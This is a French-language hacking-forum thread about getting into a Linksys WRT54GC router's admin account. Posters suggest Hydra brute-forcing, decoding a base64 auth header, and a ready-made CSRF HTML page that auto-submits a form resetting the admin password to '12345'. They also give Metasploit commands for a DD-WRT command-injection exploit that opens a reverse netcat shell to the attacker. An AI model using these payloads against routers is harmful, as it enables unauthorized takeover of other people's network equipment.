Crack-wifi.com FORUM

Plop merci pour l'info, je me suis permis d'éditer ton lien, tout étéait bon à un détail, il est toujours sympa de citer "explicitement" la source.
Sauf bien sûr si s'est ton site perso.

Salut Ramses (comme le pharaon, oui mais lequel ?), bienvenue sur le forum

Je ne suis pas sûr, mais à mon avis lesdites commandes doivent être tapées dans une session-console sur le routeur même, probablement via telnet. Tu dois donc entrer la commande "[c]telnet 192.168.1.1[/c]" dans un terminal Linux ou une invite de commande Windows (Démarrer > exécuter > cmd).

Le truc, c'est ue pour ouvrir une session en telnet il faut justement connaître le mot de passe d'accès, donc dans ton cas ça ne va sans doute pas t'avancer
A mon sens, la meilleure façon de récupérer ce genre de mot de passe c'est par la force brute mais il faut un bon dico. Après, il suffit d'utiliser Hydra pour tester toutes les combinaisons possibles et l'avantage c'est que là tu auras directement le mot de passe en clair sans devoir inverser le protocole de hachage de Cisco

Au cas ou tu es sur Windows, il faut savoir que telnet est désactivé par défaut, pour cela tu te rends dans :

Panneau de configuration > Programmes et fonctionnalités > Activer ou désactiver des fonctionnalités Windows ( dans le volet à gauche) et tu coches la case "client telnet"

Tu as tout ce qu'il faut sur les routeurs ici et leurs mdp par défaut --> Exploits & Routeurs

Bonsoir

Tu peux observer la réponse http header avec le plugin de firefox "live http header" quand tu rentres un mot de passe (meme si il est faux c'est pas grave) je connais pas la config des cisco mais c'est possible que ça soit encodé en base64 ou en ntml, si par exemple tu vois quelque chose comme ça "authorisation basic" il y a peut-etre moyen de décrypter le pass.

A ton avis? relis le post que j'ai ecris la réponse est dedans, pour infos je viens de trouver le mot de passe mais je te laisse chercher un peu, si on peux appeler ça de la recherche car tu as la réponse sous les yeux

haaan oui ok c'est pcq il est crypter en base64 bien vu :p

le seul problème est que j'ai essayé avec un faux mot de passe :p donc ce n'est pas celui la...

une autre idée koala?

Pas vraiment, l'utilisateur n'est pas sensé connaître le mot de passe haché, donc ce que Hydra (ou Medusa) va tester ce sont des mots de passe en clair. Une fois qu'il en a trouvé un qui est accepté par le routeur il le signalera à l'utilisateur, c'est pour ça que je disais que ça donnait directement accès au password.

Évidemment l'inconvénient c'est que ça oblige à avoir un dictionnaire qui contient le bon mot de passe, ou à en créer un complet mais là ça risque de prendre un bout de temps à bruteforcer

Ah oui quand même... je pensais pas que ca prendrai cette ampleur XD

Bon, en résumé, seul un brut force et une attaque par dico pourrai faire sauter ce mot de passe?

N'y a-t-il pas une façon de faire bugger le routeur pour le forcer à reset?

Ou encore, un logiciel qui me permettrai d'obtenir le hash de type 7 sans le mot de passe?

J'ai entendu parlé de "hyper-terminal", ça vous dis quelque chose?

Fuji t'a donné le lien d'un topic intéressant dans lequel figure un lien vers le site Routerpwn. On n'y trouve pas d'exploit spécifique au WRT54GC mais il y a pas mal de choses qui concernent le WRT54G qui mériteraient peut etre d'etre testées, on ne sait jamais: Routerpwn Cisco Linksys WRT54G, WAG120N.

Je pense qu'il suffit de copier-coller le code suivant dans un fichier HTML et d'ouvrir ce fichier avec le navigateur :

<html><body>
<form method="POST" action="http://192.168.1.1:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>

<SCRIPT language="JavaScript">
  document.senha.submit();
</SCRIPT>

</body></html>

Après ça le mot de passe admin devrait être "12345".

Je n'ai pas pu tester, vu que je n'ai pas de routeur de ce type à disposition. Et puis comme je te l'ai dit, il est possile que le système de ton WRT54GC ait déjà été patché pour éviter cette faille

Le framework metasploit met à disposition un exploit permettant d'exploiter le firmware "DD-WRT" :

use exploit/linux/http/ddwrt_cgibin_exec  <-- l'Exploit à utiliser.
set PAYLOAD cmd/unix/reverse_netcat       <-- Le payload à envoyer, il y a aussi le "bind_netcat" et "generic"
set RHOST                                 <-- L'adresse cible, donc: 192.168.1.1 
set RPORT                                 <-- Le port cible: 80
set LHOST                                 <-- l'adresse de ton ordi.

Description:
  This module abuses a metacharacter injection vulnerability in the 
  HTTP management server of wireless gateways running DD-WRT. This 
  flaw allows an unauthenticated attacker to execute arbitrary 
  commands as the root user account.

Comme Antares, j'ai pas de routeur sous la main et aussi qu'il soit déjà été patché contre cette faille

Si tu n'es pas initié à metasploit et au pentest en général, ne te prends pas trop la tète, laisse tomber. Sinon 
tu convoques Imhotep qui a déjà réussi un autre exploit: la construction de la pyramide